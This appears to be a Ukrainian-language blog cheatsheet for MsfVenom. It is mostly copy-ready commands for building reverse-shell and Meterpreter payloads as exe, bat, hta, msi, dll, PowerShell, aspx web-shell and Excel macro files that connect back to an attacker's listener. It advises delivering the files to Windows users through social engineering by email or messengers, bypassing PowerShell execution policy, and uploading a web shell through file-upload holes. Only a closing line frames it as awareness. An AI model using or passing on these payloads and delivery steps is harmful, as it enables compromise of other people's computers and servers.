MsfVenom Cheatsheet

MsfVenom – це автономний генератор payload для Metasploit, який також замінює msfpayload та msfencode.

TOOLS FOR FIND VULNERABILITY

Логин Свят

10/28/20233 min read

MsfVenom Cheatsheet

Вимоги:

- Kali Linux

- Windows Machine

Синтаксис MsfVenom

MsfVenom – це автономний генератор payload для Metasploit, який також замінює msfpayload та msfencode.

Payload та його типи

Payload – це шкідливі скрипти, які зловмисник використовує для взаємодії з цільовою машиною з метою її компрометації. Msfvenom підтримує наступні платформи та формати для генерації payload: Вихідний формат може бути у вигляді виконуваних файлів, таких як exe, php, dll, або у вигляді однорядкових команд.

Виконувальний payload (exe)

Тип корисного навантаження: Stager

Якщо виконати наступну команду, то ви створите шкідливий exe-файл, який є звичайним розширенням для запуску на Windows.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe

Весь шкідливий код буде записаний у файлі shell.exe та збережений на вашій машині Kali.

Поділіться цим файлом за допомогою тактики соціальної інженерії (закиньте його через пошти або соц месенджери, щоб його запустили на своєму компі власники системи windows). Тим часом запустіть netcat as слухач для захоплення зворотних з'єднань.

nc -lvp 443

Той хто відкриє файл або постукається на вашу систему, буде видно в відповіді хто саме стукається через цю команду.

Я навіть постукався з Mac OS, ось який буде результат при прослуховувані зворотнього звʼязку

Пакетний файл Powershell

Тип корисного навантаження: Stager
Виконайте таку команду, щоб створити зловмисний пакетний файл із розширенням .bat, який підходить для DOS і Windows.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat

Весь шкідливий код буде записаний у файл shell.bat і збережено на kali з назвою shell.bat .

Поділіться цим файлом за допомогою тактики соціальної інженерії (закиньте його через пошти або соц месенджери, щоб його запустили на своєму компі власники системи windows). Тим часом запустіть netcat as слухач для захоплення зворотних з'єднань.

nc -lvp 443

Той хто відкриє файл або постукається на вашу систему, буде видно в відповіді хто саме стукається через цю команду.

Корисне навантаження програми HTML (HTA)

Тип корисного навантаження: Stager

Програма HTML (HTA) — це програма Microsoft Windows, вихідний код якої складається з HTML, Динамічний HTML і одна або кілька мов сценаріїв, які підтримуються Internet Explorer, наприклад VBScript або JScript.

Виконайте таку команду, щоб створити шкідливий файл HTA. Розширення імені файлу .hta використовується в DOS і Windows.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Весь шкідливий код буде записаний у файлі shell.hta і збережений на вашій машинці. Використовуйте HTTP-сервер Python для обміну файлами.

HTA виконується за допомогою програми mshta.exe або подвійним клацанням миші на файлі.

mshta http://192.168.1.3/shell.hta

тобто ми стукаємось на нашу калі лікунс, де лежить створений нами файл з вразливим кодом.

А той хто або постукався на машину через mshta або відкив файл, то ми побачимо у зворотноьму з’єднанні через слухач Netcat, який працював у фоновому режимі і раніше.

nc -lvp 443

Microsoft Installer Payload (MSI)

Windows Installer також відомий як Microsoft Installer. Файл MSI – це пакет Windows, який надає відомості про інсталяцію, наприклад програми, які потрібно інсталювати. Це може бути використовується для встановлення оновлень Windows або стороннього програмного забезпечення, як і exe. Виконайте наступну команду для створення шкідливого файлу MSI із розширенням імені файлу shell.msi, використовується в DOS і Windows. Переносимо за допомогою соц інженерії шкідливий код у цільову систему та запускаємо його.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi

Використовуйте команду msiexec, щоб запустити файл MSI або багато разів клікаємо для запуску.

msiexec /quiet /qn /i shell.msi

А тим часом дивимось на прослуховування в Netcat.

Бібліотека динамічного посилання (DLL)

Тип корисного навантаження: Stager

DLL — це бібліотека, яка містить код і дані, які можуть використовуватися більш ніж однією програмою. Виконайте таку команду, щоб створити шкідливий dll-файл. використовується в DOS і Windows. Передайте шкідливий код у цільову систему та запустіть його.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll

Використовуйте команду rundll32, щоб запустити файл MSI або декілька раз клікнути.

rundll32.exe shell.dll,0

А тим часом дивимось на прослуховування в Netcat.

Корисне навантаження Powershell (psh-cmd)

Тип корисного навантаження: Stager

Формат – psh, psh-net, psh-reflection або psh-cmd. Згенероване корисне навантаження для форматів psh, psh-net і psh-reflection має розширення .ps1, а створене корисне навантаження для формату psh-cmd має розширення .cmd. Інакше ви можете безпосередньо виконати raw код у командному рядку цільової системи.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd -f raw

Виконайте таку команду, щоб створити необроблений код для шкідливої ​​програми PowerShell. Для виконання скопіюйте згенерований код і вставте його в командний рядок Windows. Це принесе зворотне з’єднання через слухач netcat, який працював у фоновому режимі підключення. Зверніть увагу, тут ми вже не файл створюємо, а код, який треба заставити виконати на машині жертви.

Корисне навантаження Powershell (ps1)

Тип корисного навантаження: Stager

Файл PS1 — це сценарій, який використовується Windows PowerShell. Файли PS1 схожі на файли .BAT і .CMD, за винятком того, що вони виконуються в Windows PowerShell замість командного рядка. Виконати наступну команду для створення шкідливого сценарію PS1 із розширенням імені файлу. PS1. Використовується в Windows PowerShell.

msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1

Оскільки типом зворотної оболонки є meterpreter, нам потрібно запустити exploit/multi/handler всередині Фреймворку Metasploit.

Політика виконання PowerShell — це функція безпеки, яка контролює умови, за яких PowerShell завантажує конфігураційні файли та запускає сценарії. Ця функція допомагає запобігти виконанню шкідливих сценаріїв. Це запобігає запуску всіх сценарій, включаючи файли форматування та конфігурації (.ps1xml), сценарій модуля файли (.psm1) і профілі PowerShell (.ps1).

Додаткова інформація доступна тут.

Щоб виконати сценарій PS1, вам потрібно обійти політику виконання, виконавши наступну команду в Windows PowerShell і виконати сценарій.

powershell -ep bypass
.\shell.ps1

За допомогою фреймворку metasploit, виконуємо такі команди:

msfconsole - запуск фреймворку

use exploit/multi/handler - використання експлойту

set lhost 192.168.1.3 - зберігаємо хост

set lport 443 - зберігаємо порт

set payload windows/x64/meterpreter_reverse_https - зберігаємо набір пейлоудів

exploit - запускаємо експлойт, та чекаємо успішного відпрацювання

sysinfo - дивимось в інфо про систему, якщо ми підконектились до жертви

Як це приблизно виглядає, нижче на зображені.

Корисне навантаження веб-оболонки (ASPX)

Тип корисного навантаження: Stageless

Файл ASPX — це файл Active Server Page Extended для платформи Microsoft ASP.NET. Коли URL переглядаються, ці сторінки відображаються у веб-браузері користувача. «Веб-форми .NET» — інша їх назва.

Виконайте наступну команду, щоб створити шкідливий сценарій aspx із розширенням імені файлу. aspx.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx

І тут також, оскільки зворотним типом оболонки є meterpreter, нам потрібно запустити exploit/multi/handler всередині metasploit.

Ви можете тепер завантажити створений вразливий файл, для подальшого використання вразливості необмеженого завантаження файлів на сервер, де є можливість дірка до потенційної атаки, якщо метою є IIS Web Сервер. Бачите палоудер, завантажуєте в нього файл, пробуєте в урлі тепер перейти на цей файл, додавши його в шлях, ну впринципі, як показано знизу на зображені.

Команди які потрібно буде виконати в метасплоіті, тут я тільки прикладу команди, як це робити робив вище скрін.

msfconsole

use exploit/multi/handler

set lhost 192.168.1.3

set lport 443

set payload windows/x64/meterpreter/reverse_https

exploit

sysinfo

Як тільки зловмисник виконає шкідливий скрипт, він отримає зворотне з'єднання через сеанс meterepreter

Visual Basic (.vba)

Тип корисного навантаження: Stageless

VBA — це розширення файлу, яке зазвичай асоціюється з Visual Basic, яке підтримує такі програми від Microsoft як Microsoft Excel, Office, PowerPoint, Word і Publisher. Він використовується для створення «макросів», які виконуються всередині Excel. Зловмисник користується перевагами цих функцій і створює шкідливий сценарій VB для виконання макропрограма з Microsoft Excel.

Виконайте наведену нижче команду, щоб створити шкідливий сценарій aspx із розширенням назви файлу.aspx, виконуватимуться для макросів в Microsoft Excel.

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba

Тепер ми відкриваємо нашу робочу книгу, у яку введено шкідливі макроси.

Як тільки зловмисник виконає шкідливий скрипт у жертви, він отримає зворотне з'єднання через сеанс meterepreter.

Також треба буде запустити местасплоіт і використати експлоіт exploit/multi/handler.

use exploit/multi/handler

set payload

windows/x64/meterpreter/reverse_https

set lhost 192.168.1.3

set lport 443

exploit

sysinfo

Висновки: тепер, на прикладах створення шкідливих файлів для віндовс, ви знаєте як злоумисники можуть створювати шкідливі файли, для того, щоб нанести на вас атаку, тому не тикайте в каку курсором, задумайтесь перед тим як відкривати та запускати у себе в системі від різних підозрілих персон, які шлють на пошту або месенджери.